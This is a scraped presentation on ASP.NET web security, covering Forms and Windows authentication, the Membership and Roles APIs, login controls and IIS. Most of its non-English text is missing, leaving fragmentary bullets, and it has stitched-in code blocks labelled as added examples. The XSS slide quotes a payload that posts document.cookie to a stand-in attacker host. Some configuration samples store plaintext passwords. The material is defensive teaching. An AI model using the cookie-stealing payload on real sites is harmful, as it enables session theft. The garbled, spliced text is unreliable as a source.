Web PowerPoint PPT Presentation


Web


  • (), .

  • :

    • ( , , );

    • (MembershipAPI) .

    • .

    • ( ) (, , ) .

    • (profile, ).

    • (Cryptography)

    • .


Web

  • :

    • , .

    • , .

    • (web.config).



ASP.NET

  • ASP.NET provides security features in addition to those provided by IIS

    • Oriented around client authentication

    • Several methods are available for integrating authentication into your pages

    • Managed through web.config

  • Accessing authenticated client information

    • The User property of the Page class provides access to current client information



Authentication and Authorization

  • Authentication Modes

    • Mode=None

    • Mode=Windows

    • Mode=Forms

  • Authorizing clients

    • Authorization element used to describe which clients are granted access

    • Supports the sub-elements allow and deny

      • Users, roles, verbs

      • ? represents anonymous users

      • * represents all clients

    • The first match found (allow or deny) determines authorization



Windows Authentication

  • User credentials are defined in Active Directory

  • Leverage IIS to perform authentication

    • IIS challenges browser by sending a 401 status code

    • IIS forwards the username to ASP.NET



Forms Authentication

  • Common approach for performing application-level authentication

    • Application manages storage of credentials

    • Application handles authentication

  • FormsAuthentication class

  • Credential Management and storage



Security providers for common tasks

  • Membership providers

    • Works with xxMembershipProvider to simplify common tasks in building security infrastructure

      • CreateUser

      • DeleteUser

      • ChangePassword

      • ValidateUser

  • Role providers

    • xxRoleProvider implements common role-based authorization features

      • CreateRole

      • IsUserInRole

      • GetAllRoles

      • GetRolesForUser

  • Several new controls generate large pieces of security UI



Example: Login control

  • Building a login page now consists of:



How it works


Where's the data?



Membership controls

  • Several new controls available that tap into the membership and role providers

    • <asp:Login ... />

      • login authentication form

    • <asp:LoginView ... />

      • alternate views based on identity

    • <asp:PasswordRecovery ... />

      • password retrieval form (only with un-hashed passwords)

    • <asp:LoginStatus ... />

      • Status and hyperlink to login/logout based on the state

    • <asp:LoginName ... />

      • displays username for authenticated users

    • <asp:CreateUserWizard ... />

      • form for entering new users

    • <asp:ChangePassword ... />

      • form for changing password



ASP.Net

  • , web-.

  • web .

  • (security) (, , ) . :

    • ;

    • ,

      • .

  • ASP.Net (framework) , . :

    • , .

    • () , .


Web

  • web :

    • ( ),

  • , , .

    • , , .

    • ( SSL )

    • ( ).


Web

  • web :

    • . .

    • SQL . ( ), SQL .

    • web () (encoding). HTML (, ), (cross-site scripting vulnerabilities). HttpUtility.HtmlEncode() , < >, , .

    • , web web . , web , . , web . plug-ins , .


Web

  • , web view state: View state . EnableViewStateMAC true, view state , machine key machine.config web . EnableViewStateMAC=true, , view state, web .

  • SSL ASP.NET .

  • : , timeouts , .

  • SSL: , web , web SSL. (image directories) SSL.


Web

  • view state: View state .

  • EnableViewStateMAC = true , view state message authentication code, machine key machine.config web server. EnableViewStateMAC=true, view state , , .

  • SSL (Secure Sockets Layer) ASP.NET .

  • cookies: , , , timeouts , , .

  • SSL: , web , website SSL. , SSL.


Web

(XSS).

  • (XSS, Cross Site Scripting) , HTML- .

  • , , , : <,>,, .

    Response.Write(Request.QueryString["name"]);

  • :

    <a href=http://www.contoso.com/req.asp?name=
    <FORM action=http://www.badsite.com/data.asp method=post id=badForm>
    <input name=cookie type=hidden>
    </FORM> <SCRIPT>
    badForm.cookie.value=document.cookie;
    badForm.submit();
    </SCRIPT> > ! </a>.
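The slide's sink, `Response.Write(Request.QueryString["name"])`, beside its encoded form. This is an added example, not code from the presentation; the page class `Greeting`, the control ID `SafeGreeting` and the helper `SafeLink` are hypothetical, while `HttpUtility.HtmlEncode` and `HttpUtility.HtmlAttributeEncode` are the real System.Web APIs the earlier slide names. It goes a step beyond the slide by showing that the encoder depends on the output context and that encoding alone does not neutralise a `javascript:` URL.

```csharp
// Added example (not from the slides): reflected-XSS sink and its encoded counterpart.
// Greeting, SafeGreeting and SafeLink are hypothetical names.
using System;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class Greeting : Page
{
    protected Literal SafeGreeting; // stands in for the designer-generated field

    protected void Page_Load(object sender, EventArgs e)
    {
        string name = Request.QueryString["name"] ?? string.Empty;

        // Vulnerable sink from the slide: whatever is in ?name= is emitted as markup,
        // so a value containing <script> runs in the victim's browser.
        //     Response.Write(Request.QueryString["name"]);

        // Hardened: encode for the HTML text context. < > & " become entities,
        // so the input is displayed as text and never parsed as tags.
        SafeGreeting.Text = "Hello, " + HttpUtility.HtmlEncode(name);
    }

    // A link whose URL and label both come from the request. Attribute and text
    // contexts need different encoders, and neither stops a javascript: URL, so the
    // scheme is whitelisted before the value is placed in href.
    internal static string SafeLink(string url, string label)
    {
        Uri parsed;
        bool ok = Uri.TryCreate(url, UriKind.Absolute, out parsed)
                  && (parsed.Scheme == Uri.UriSchemeHttp || parsed.Scheme == Uri.UriSchemeHttps);
        if (!ok)
        {
            return HttpUtility.HtmlEncode(label); // drop the link, keep the text
        }
        return "<a href=\"" + HttpUtility.HtmlAttributeEncode(parsed.AbsoluteUri) + "\">"
             + HttpUtility.HtmlEncode(label) + "</a>";
    }
}
```

ASP.NET request validation (on by default since 1.1) rejects most query strings containing `<script`, but it is a backstop: output encoding at the sink is what makes the page safe for values that arrive from a database, a cookie or a later framework version.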



- Gatekeepers

  • Gatekeepers , .

  • , , . (gatekeeper), .

  • , .


Web

  • (Authentication) , ( ).

  • (Authorization) , .

  • (Confidentiality) , , , . web . ( ), .

  • (Integrity) , , , . .



ASP.Net

  • ASP.NET

  • .NET Framework System.Security

  • SSL , web .


Web

  • . .

  • , (identity) (, )

  • ASP.Net :

    • Windows

    • Forms

    • Passport

    • (custom)

  • .

  • (identity) .

    • , Windows OC 96 , SID (security ID), .

  • ASP.Net Forms , .

  • , , , . (personalization) (customization), web , , ..



(Authorization)

  • .

  • (role-based authorization). , .

  • web .

  • , , .

  • , ASP.Net , web .

  • , (, , , ) OC Windows Windows, .

  • ASP.Net ( IIS 5 ASPNET).


(Confidentiality and Integrity)

  • , , .

  • , , .

  • .

  • , . ASP.Net , . .

  • web :

    • . SSL. SSL . SSL ASP.Net, IIS.

    • .


Web

web , . Web , . , . web . web , , :

web . (identity) , (, web ). .

, web IIS ( Windows ).

, web . , .


Web

web ,


Web

web

  • web , , , , :

  • web . (identity) , (, web - login dialog box). .

  • , web . .

  • (credentials) (roles) , . , ; .

  • , (log in again) , (access denied message).


Web

web ,



Internet Information Services

  • ASP.Net , IIS .

  • IIS :

    • : IIS , Windows. .. IIS Windows . IIS

      • Digest

      • Passport

      • Windows

      • Certificate SSL.

    • : IIS IP Windows ACL (Access Control Lists), , .

    • : SSL.


IIS 5.x and IIS 6.0

  • ASP.Net Windows , IIS Basic ( Digest) .

  • ASP.Net Windows ( form ), IIS .



IIS 5 6

  • , web


Web

  • "Windows authentication" IIS (credentials) Windows . , , , .

  • "Basic authentication" W3C HTTP (header) . , . Base64. , Basic authentication SSL. Windows authentication, Windows. . , Basic authentication HTTP header, Windows authentication NTLM (Windows NT LAN Manager) - - ) Kerberos.

  • "Digest authentication" "Basic authentication". , Base64, . , , ( ).


Web

  • "Passport authentication" Microsoft Passport. Microsoft Passport (). - Passport server. Microsoft, Passport . , .NET Passport authentication, , .NET Framework.

  • Passport authentication, "Windows Live ID", Windows Live. Windows Live ID ID, , Passport.

  • IIS - certificate authentication, SSL.



IIS 5 6

  • , IP IIS.

  • IP web .

  • , web .



IIS 5(6) IIS 7



ASP.Net

  • Gatekeepers

  • HTTP . IHttpModule



ASP.Net

  • HTTP , IHttpModule HttpApplication.AuthenticateRequest. Authenticat, Global.asax .

  • <authentication> web.config web .

  • ASP.NET :

    • FormsAuthenticationModule

    • WindowsAuthenticationModule

    • PassportAuthenticationModule


Web

  • Web

  • Global.asax

  • HTTP



ASP.Net

  • FormsAuthenticationModule , (login page) , ASP.Net .

  • ,

    <authentication mode="Forms" />

  • :

    <authentication mode="Windows" />

    <authentication mode="Passport" />



ASP.Net

  • , , (security context) ASP.NET .

  • HttpContext.Current.User .

  • ASP.NET :

  • UrlAuthorization: <authorization> web.config web . ..

  • FileAuthorization: Windows , ASP.NET FileAuthorization Windows Windows ACL ( ). , Windows , , (read access rights) , web . Windows .

  • web , web . HttpContext.Current.User (role membership) .


Web

Forms Authentication



Forms Authentication

  • (ticket token).

  • , (ticket) . , , .

  • web , , ASP.Net .

  • , ASP.Net (login page). .

  • , ASP.Net ( FormsAuthentication) ( - ticket) .

  • , ticket .


Web

  • , Windows.

  • Form Authentication

    • ;

    • (login form); (Login control).

    • , HTML;

    • .

  • (login page), .

  • ( ).


Web

  • Forms Authentication web.config.

  • . .

  • membership API, .

  • .

    • , , web .

    • , , , - .

  • membership API ASP.Net profiles API, .


Forms Authentication

1. web.config

2. IIS, ASP.Net web .

3. (login page), , .


Forms Authentication

    <authentication mode="Forms">
      <!-- Detailed configuration options -->
      <forms name="MyCookieName"
             loginUrl="DbLogin.aspx"
             timeout="20">
        <credentials passwordFormat="Clear">
          <user name="admin" password="aaaaa"/>
          <user name="mario" password="bbbbb"/>
          <user name="petr" password="ccccc"/>
        </credentials>
      </forms>
    </authentication>

    <authentication mode="Forms">
      <!-- Detailed configuration options -->
    </authentication>

    <authentication mode="Forms">
      <!-- Detailed configuration options -->
      <forms name="MyCookieName"
             loginUrl="DbLogin.aspx"
             timeout="20"
             slidingExpiration="true"
             cookieless="AutoDetect"
             protection="All"
             requireSSL="false"
             enableCrossAppRedirects="false"
             defaultUrl="MyDefault.aspx"
             domain="www.mydomain.com"
             path="/"
             />
    </authentication>



Forms Authentication



web.config

    <authentication mode="Forms">
      <!-- Detailed configuration options -->
      <forms name="MyCookieName">
        <credentials passwordFormat="Clear">
          <user name="Admin" password="(Admin1)"/>
          <user name="Mario" password="Szpuszta"/>
        </credentials>
      </forms>
    </authentication>

    <!-- -->
    <authorization>
      <deny users="?" />
    </authorization>



web.config

  • web.config:

    <authentication mode="Forms">
      <!-- Detailed configuration options -->
      <forms name="MyCookieName"
             loginUrl="DbLogin.aspx"
             timeout="20">
        <credentials passwordFormat="Clear">
          <user name="Admin" password="(Admin1)"/>
          <user name="Mario" password="Szpuszta"/>
          <user name="Matthew" password="MacDonald"/>
        </credentials>
      </forms>
    </authentication>

  • web.config . . , , . ( , ).



web.config

  • <credentials /> <forms /> passwordFormat, :

  • Clear - <user />

  • MD5 - MD5.

  • SHA1 - SHA1. .


Web

  • string hashedPwd =
        FormsAuthentication.HashPasswordForStoringInConfigFile(clearTextPassword, "SHA1");

  • web.config

  • web.config

    Configuration MyConfig = WebConfigurationManager.OpenWebConfiguration("~/");
    ConfigurationSectionGroup SystemWeb = MyConfig.SectionGroups["system.web"];
    AuthenticationSection AuthSec =
        (AuthenticationSection)SystemWeb.Sections["authentication"];
    AuthSec.Forms.Credentials.Users.Add(
        new FormsAuthenticationUser(UsernameText.Text, PasswordText.Text));
    MyConfig.Save();


Web

  • <authorization> :

    <configuration>
      <system.web>
        <!-- Other settings omitted. -->
        <authorization>
          <deny users="?" />
        </authorization>
      </system.web>
    </configuration>

  • (?) . , . forms authentication ticket ( ). ASP.NET login page ( , ).

  • <authentication>, <authorization> web.config web . web .


Web

web



IIS 7.0 Forms Authentication

  • IIS7 .

  • IIS7 web.config ( ).

  • forms authentication IIS7.

    • .



form authentication


Web


Web



Forms Authentication

  • FormsAuthentication forms authentication. ticket, cookie, login page , .

  • FormsIdentity IIdentity forms authentication. Ticket, forms authentication ticket. ticket.



FormsAuthentication

  • web .

  • forms authentication. ticket, cookie, login page , .


Web


Web

Click :

    protected void LoginAction_Click(object sender, EventArgs e)
    {
        Page.Validate();
        if (!Page.IsValid) return;

        if (FormsAuthentication.Authenticate(UsernameText.Text, PasswordText.Text)) {
            // Create the ticket, add the cookie to the response,
            // and redirect to the originally requested page
            FormsAuthentication.RedirectFromLoginPage(UsernameText.Text, false);
        }
        else
        {
            // User name and password are not correct
            LegendStatus.Text = "Invalid username or password!";
        }
    }



FormsAuthentication

  • Authenticate(UsernameText.Text, PasswordText.Text)

    true , false.

  • RedirectFromLoginPage(UsernameText.Text, false);

    :

  • authentication ticket.

  • authentication ticket.

  • ticket.

  • HTTP response, .

  • ( ).

  • SignOut();

  • RedirectToLoginPage(); .
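A complete login/logout code-behind that uses the FormsAuthentication members listed above (RedirectFromLoginPage, SignOut, RedirectToLoginPage) with the Membership provider instead of the web.config credential list. This is an added example, not code from the presentation: the control IDs UsernameText, PasswordText and LegendStatus follow the slide's handler, the CheckBox RememberMe and the class name DbLogin are assumed, and the fields stand in for the designer-generated ones.

```csharp
// Added example (not from the slides): login and logout with FormsAuthentication + Membership.
// RememberMe and DbLogin are assumed names; the other control IDs come from the slide.
using System;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class DbLogin : Page
{
    protected TextBox UsernameText;
    protected TextBox PasswordText;
    protected CheckBox RememberMe;
    protected Label LegendStatus;

    protected void LoginAction_Click(object sender, EventArgs e)
    {
        Page.Validate();
        if (!Page.IsValid) return;

        string userName = UsernameText.Text.Trim();

        // Provider-side lockout (maxInvalidPasswordAttempts in <membership>) is enforced
        // in the store; a counter kept in ViewState can simply be dropped by the client.
        MembershipUser user = Membership.GetUser(userName);
        if (user != null && user.IsLockedOut)
        {
            LegendStatus.Text = "Account is locked; contact an administrator.";
            return;
        }

        if (Membership.ValidateUser(userName, PasswordText.Text))
        {
            // Creates the authentication ticket, writes the cookie and redirects to
            // ReturnUrl (or defaultUrl). A persistent cookie only when the user asked for it.
            FormsAuthentication.RedirectFromLoginPage(userName, RememberMe.Checked);
        }
        else
        {
            // Same message for unknown user and wrong password: do not reveal which failed.
            LegendStatus.Text = "Invalid username or password!";
        }
    }

    protected void Logout_Click(object sender, EventArgs e)
    {
        // SignOut removes the ticket cookie only; session state is cleared separately.
        FormsAuthentication.SignOut();
        Session.Abandon();
        FormsAuthentication.RedirectToLoginPage();
    }
}
```

With `requireSSL="true"` in `<forms>` the ticket cookie is marked Secure, which is what keeps the ticket off plaintext connections; the `protection="All"` setting from the earlier web.config only encrypts and signs its contents.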



User Page

  • System.Security.Principal

  • User principal, , , .

  • User :

    • Identity ( Identity)

      • Name,

      • IsAuthenticated,

      • AuthenticationType;

    • bool IsInRole(string role).



Principal Identity

  • Principal :

    • Identity, Identity, .

    • IsInRole() .

  • Identity :

    • AuthenticationType: (Forms, Passport, NTLM, custom).

    • IsAuthenticated: true false.

    • Name: .


Web

  • Principal IsInRole(), . true .

  • :

    if (User.IsInRole("Supervisors"))
    {
        // Do nothing, the page should be accessed as normal because the
        // user has administrator privileges.
    }
    else
    {
        // Don't allow this page. Instead, redirect to the home page.
        Response.Redirect("default.aspx");
    }
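The same role check factored into a base page, with the imperative IsInRole test from the slide and a declarative PrincipalPermission demand on the protected method. This is an added example, not code from the presentation: "Supervisors" is the slide's role name, while RoleGatedPage, ReportPage and RunReport are hypothetical; PrincipalPermission is the real System.Security.Permissions attribute, which works here because ASP.NET sets Thread.CurrentPrincipal to HttpContext.User.

```csharp
// Added example (not from the slides): role gate as a base page plus a declarative demand.
// RoleGatedPage, ReportPage and RunReport are hypothetical names.
using System;
using System.Security;
using System.Security.Permissions;
using System.Web;
using System.Web.Security;
using System.Web.UI;

public abstract class RoleGatedPage : Page
{
    // Role the derived page requires; checked before any page logic runs.
    protected abstract string RequiredRole { get; }

    protected override void OnInit(EventArgs e)
    {
        base.OnInit(e);

        // Unauthenticated callers go to the login page (UrlAuthorization does this too
        // when <deny users="?"/> is configured); RedirectToLoginPage appends ReturnUrl.
        if (!User.Identity.IsAuthenticated)
        {
            FormsAuthentication.RedirectToLoginPage();
            return;
        }

        // Authenticated but not in the role: answer 403 instead of a redirect, so the
        // denial is recorded in the IIS log and cannot be mistaken for a login prompt.
        if (!User.IsInRole(RequiredRole))
        {
            Response.StatusCode = 403;
            Response.End();
        }
    }
}

public partial class ReportPage : RoleGatedPage
{
    protected override string RequiredRole { get { return "Supervisors"; } }

    // Defence in depth: if this method is ever reached by another path, the demand
    // throws SecurityException unless Thread.CurrentPrincipal is in the role.
    [PrincipalPermission(SecurityAction.Demand, Role = "Supervisors")]
    protected string RunReport()
    {
        return "report for " + User.Identity.Name;
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        try
        {
            Response.Write(HttpUtility.HtmlEncode(RunReport()));
        }
        catch (SecurityException)
        {
            Response.StatusCode = 403;
        }
    }
}
```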


Web

(), (Membership, Roles, and Profile)



API (Membership RolesAPI)

  • ( ) API.

  • Membership API . , , .

  • Roles API , (roles)/ .

  • Profiles API , . (user profile) , web . , .


Web

  • Membership , .

  • Roles .

  • Profiles .


Web

Membership API



- Membership

  • .

  • membership API. Forms Authentication. API (login pages credential storage).

  • Membership API . .. .



ASP.Net Membership API

  • .

  • , e-mail ( e-mail ).

  • , . , E-mail.

  • . , web .

    • (login pages)

    • (registration pages)

    • .

  • , (membership provider classes). API , .

  • , membership API SQL Server Express .



Membership API



Membership API

  • - System.Web.Security



Membership



Membership

  • Membership :



Membership

  • GetUser- MembershipUser , . , .

  • ValidateUser user name password. , login.

  • FindUsersByEmail membership , e-mail e-mail .

  • FindUsersByName- membership , .

  • GeneratePassword .


Web

  • GetAllUsers .

  • GetNumberOfUsersOnline 1 .

  • GetUserNameByEmail e-mail e-mail .

  • UpdateUser ..

  • CreateUser

  • DeleteUser .


Web

  • :

    Membership.ValidateUser(UserNameText.Text, PasswordText.Text)

  • :

    MembershipCreateStatus Status;
    Membership.CreateUser(UserNameText.Text,
                          PasswordText.Text,
                          UserEmailText.Text,
                          PwdQuestionText.Text,
                          PwdAnswerText.Text, true,
                          out Status);
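The CreateUser call above with its out status actually handled, and the new account added to a role the way the later Roles slides (Roles.RoleExists / Roles.AddUserToRole, and CreateUserWizard.CreatedUser) describe. This is an added example, not code from the presentation: the control IDs mirror the slide, the class name Register, the Label StatusLabel and the role name "Users" are assumed, and MembershipCreateStatus values are the real enum members of System.Web.Security.

```csharp
// Added example (not from the slides): registration through the Membership API with every
// MembershipCreateStatus outcome handled. Register, StatusLabel and "Users" are assumptions.
using System;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;

public partial class Register : Page
{
    protected TextBox UserNameText, PasswordText, UserEmailText, PwdQuestionText, PwdAnswerText;
    protected Label StatusLabel;

    const string DefaultRole = "Users"; // assumed to exist (WAT or Roles.CreateRole)

    protected void Register_Click(object sender, EventArgs e)
    {
        MembershipCreateStatus status;
        MembershipUser newUser = Membership.CreateUser(
            UserNameText.Text.Trim(),
            PasswordText.Text,
            UserEmailText.Text.Trim(),
            PwdQuestionText.Text,
            PwdAnswerText.Text,
            true,            // isApproved: pass false if an administrator must approve first
            out status);

        if (status != MembershipCreateStatus.Success)
        {
            StatusLabel.Text = DescribeFailure(status);
            return;
        }

        // Role assignment belongs with account creation (or CreateUserWizard.CreatedUser),
        // never in the login page where it would run for every authenticated user.
        if (Roles.RoleExists(DefaultRole) && !Roles.IsUserInRole(newUser.UserName, DefaultRole))
        {
            Roles.AddUserToRole(newUser.UserName, DefaultRole);
        }

        FormsAuthentication.RedirectFromLoginPage(newUser.UserName, false);
    }

    // Maps provider status codes to messages. Password length/strength and e-mail
    // uniqueness are enforced by the <membership> provider settings, not by this page.
    internal static string DescribeFailure(MembershipCreateStatus status)
    {
        switch (status)
        {
            // These two confirm that an account exists; acceptable on an open registration
            // form, otherwise collapse them into the generic message below.
            case MembershipCreateStatus.DuplicateUserName:
                return "That user name is already taken.";
            case MembershipCreateStatus.DuplicateEmail:
                return "An account with that e-mail address already exists.";
            case MembershipCreateStatus.InvalidPassword:
                return "The password does not meet the length or complexity policy.";
            case MembershipCreateStatus.InvalidEmail:
                return "The e-mail address is not valid.";
            case MembershipCreateStatus.InvalidQuestion:
            case MembershipCreateStatus.InvalidAnswer:
                return "A password question and answer are required.";
            case MembershipCreateStatus.InvalidUserName:
                return "The user name is not valid.";
            case MembershipCreateStatus.UserRejected:
                return "Registration was rejected.";
            default:
                return "The account could not be created (" + status + ").";
        }
    }
}
```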



MembershipUser

  • membership membership

    • UserName

    • Email

    • Comment

    • CreationDate

    • PasswordQuestion

    • LastLoginDate


  • :

    • GetPassword()

    • ChangePassword()


Web

Roles API



Roles API Role-Based Authorization

  • ASP.NET membership API.

  • , :

    • , .

    • SQL Server , Membership. many-to-many , aspnet_regsql.exe.

    • , RoleManagerModule, RolePrincipal.

    • Roles.


Web

web

  • Enable Roles Web Site Security Setup Wizard Enable Roles Security WAT.

    <configuration>
      <system.web>
        <roleManager enabled="true" />
        <authentication mode="Forms" />
      </system.web>
    </configuration>


Web

  • API , RoleManagerModule RolePrincipal, identity , .

  • RolePrincipal IPrincipal, principal . , identity IsInRole().

  • principal.

  • , IsInRole().



Roles

:

  • CreateRole(roleName) ;

  • DeleteRole(roleName) ;

  • AddUserToRole(userName, roleName) ( );

  • IsUserInRole(roleName) / IsUserInRole(userName, roleName) , (true ; false - ).

  • GetAllRoles() .

  • GetRolesForUser() / GetRolesForUser(userName) / .

    if (!Roles.IsUserInRole(EveryoneRoleName) &&
        Roles.RoleExists(EveryoneRoleName))
    {
        Roles.AddUserToRole(User.Identity.Name, EveryoneRoleName);
    }


Web

  • AddUserToRole (user name) (role name); string.

  • CreateRole .

  • DeleteRole .

  • FindUsersInRole . , (usernameToMatch).

  • IsUserInRole true, .

  • RemoveUserFromRole .

  • RoleExists true, .


Web

web


Web

  • .

  • Enable Roles for This Web Site, Security Setup Wizard Enable Roles Security WAT.

  • .


Web

web-

  • Web . Web , , . (, , , ), .

  • ASP.NET Membership.

  • , .

  • .

  • , .

  • Simple Mail Transport Protocol (SMTP) . Application Web Site Administration Tool.

  • Visual Studio.



Membership API

ASP.NET membership API :

1. forms web.config .

2. membership . , SQL Server, SQL Server.

3. membership, web.config.

4. membership web , membership API functions.

5. (login page), Login login page, Membership .

( ) ASP.NET WAT, (security wizard).

Web Site -> ASP.NET Configuration Visual Studio.



ASP.NET Membership

  • ASP.NET Web application Visual Studio. (, ), .

  • Website ASP.NET Configuration.

  • ( ) Security () Use The Security Setup Wizard ( ) .

  • 1, Next.

  • 2, From The Internet ( ) ASP.NET membership ( ) From A Local Area Network ( ) Windows . Next.

  • 3, , Advanced Provider Settings. Microsoft SQL 2005 Server Express Edition App_Data Web . Next.



ASP.NET Membership ()

7. 4, . , . Enable Roles For This Web Site. Next.

8. , , ., Users Administrators. Next.

9. 5, Create User. . Next.

10. 6, , . Next.

11. 7, Finish. Security Web Site Administration Tool, , .


Web

  • ASP.NET SQL Server Express Edition, membership . (Security) WAT . . SqlMembershipProvider. SQL Server 2005 Express Edition!

  • SQL Server, .

  • ASPNETDB.MDF web App_Data.

  • ,

    • ;

    • ;

    • ;

    • .


Web

  • , ASP.NET MDB ASPNETDB.MDF, web App_Data.

  • , :

  • aspnet_regsql.exe TSQL, .NET Framework.

  • .

  • <roleManager>.

  • .

  • <roleManager>, WAT.

    <configuration>


Web

  • ASP.Net aspnet_regsql.exe web .

    • Wizard interface ()

  • InstallCommon.sql

    sqlcmd -S (local)\SQLExpress -E -i InstallCommon.sql



Wizard aspnet_regsql.exe



aspnet_regsql.exe


Web

    <connectionStrings>
      <add name="MyMembershipConnString"
           connectionString="data source=(local)\SQLEXPRESS;Integrated Security=SSPI;initial catalog=MyDatabase" />
    </connectionStrings>

    <system.web>
      <authentication mode="Forms" />
      <membership defaultProvider="MyMembershipProvider">
        <providers>
          <add name="MyMembershipProvider"
               connectionStringName="MyMembershipConnString"
               applicationName="MyMembership"
               enablePasswordRetrieval="false"
               enablePasswordReset="true"
               requiresQuestionAndAnswer="true"
               requiresUniqueEmail="true"
               passwordFormat="Hashed"
               type="System.Web.Security.SqlMembershipProvider" />
        </providers>
      </membership>
    </system.web>


Web

  • membership

    • WAT Website -> ASP.NET Visual Studio

    • (Security)

    • Create User.

  • aspnet_Users aspnet_Membership :

    • Visual Studio Server Explorer ( membership Server Explorer)

    • SQL Server Management Studio

  • aspnet_Membership (password) (password question) passwordFormat="Hashed" <membership> web.config.



IIS 7.0



IIS 7.0


Web

WAT


Web

-


Web


Web


Web

web

  • Login , , . Login control ASP.NET, Authenticate.

  • LoginView . , , .

  • LoginStatus login , logout .

  • LoginName , .

  • PasswordRecovery - , e-mail .

  • CreateUserWizard .

  • ChangePassword .



Login

  • , . Log In .

  • Log In, membership API function Membership.ValidateUser(), FormsAuthentication.RedirectFromLoginPage(), .

  • UI Login . , Remember me next time, true createPersistentCookie RedirectFromLoginPage(). FormsAuthenticationModule .

  • layout , , .

  • membership provider web .



Login

    <asp:Login ID="Login1" runat="server"
        BackColor="aliceblue"
        BorderColor="Black" BorderStyle="double"
        CreateUserText="Register"
        CreateUserUrl="Register.aspx"
        HelpPageText="Additional Help"
        HelpPageUrl="HelpMe.htm"
        InstructionText=" <br> .">
      <LoginButtonStyle BackColor="DarkBlue" ForeColor="White" />
      <TextBoxStyle CssClass="MyLoginTextBoxStyle" />
      <TitleTextStyle Font-Italic="True" Font-Bold="True"
          Font-Names="Verdana" />
    </asp:Login>



Login



Login

    protected void Page_Load(object sender, EventArgs e){
        if (!this.IsPostBack)
            ViewState["LoginErrors"] = 0;
    }

    protected void LoginCtrl_LoginError(object sender, EventArgs e){
        // If the "LoginErrors" state does not exist, create it
        if (ViewState["LoginErrors"] == null)
            ViewState["LoginErrors"] = 0;

        // Increase the number of invalid logins
        int ErrorCount = (int)ViewState["LoginErrors"] + 1;
        ViewState["LoginErrors"] = ErrorCount;

        // Now validate the number of errors
        if ((ErrorCount > 3) && (LoginCtrl.PasswordRecoveryUrl != string.Empty))
            Response.Redirect(LoginCtrl.PasswordRecoveryUrl);
    }



Login

1. login page Login.aspx. , web.config.

2. login Login . Login , . Login id .


Web


Web

  • ValidationSummary ValidationSummary.ValidationGroup ID Login. , .

  • PasswordRecovery. , ID , e-mail. .


Web

5. LoginStatus . LoginStatus , . master pages, LoginStatus master page.

  • , , ASP.NET membership Web Site Administration Tool (WAT), Login .

  • (credentials), membership, LoginStatus .

  • , Login , .

  • Login.LoginError (Security event log). PasswordRecovery.UserLookupError PasswordRecovery.AnswerLookupError. , .


Web

1. , , NewUser.aspx.

  • CreateUserWizard. (name), (password), e-mail, .

  • CreateUserWizard .


Web


Web

3. ContinueButtonClick. , , , :

    protected void CreateUserWizard1_ContinueButtonClick(object sender, EventArgs e)
    {
        Response.Redirect("Members/Default.aspx");
    }

, .

( , Users) CreateUserWizard.CreatedUser Roles.AddUserToRole.


Web

1. , , ManageUser.aspx.

  • ChangePassword

  • ValidationSummary ValidationSummary.ValidationGroup ID ChangePassword. , . , Confirm New Password, ChangePassword . ValidationSummary, Confirm New Password is required. Login, ValidationSummary.

    4. ContinueButtonClick. , .


  • Login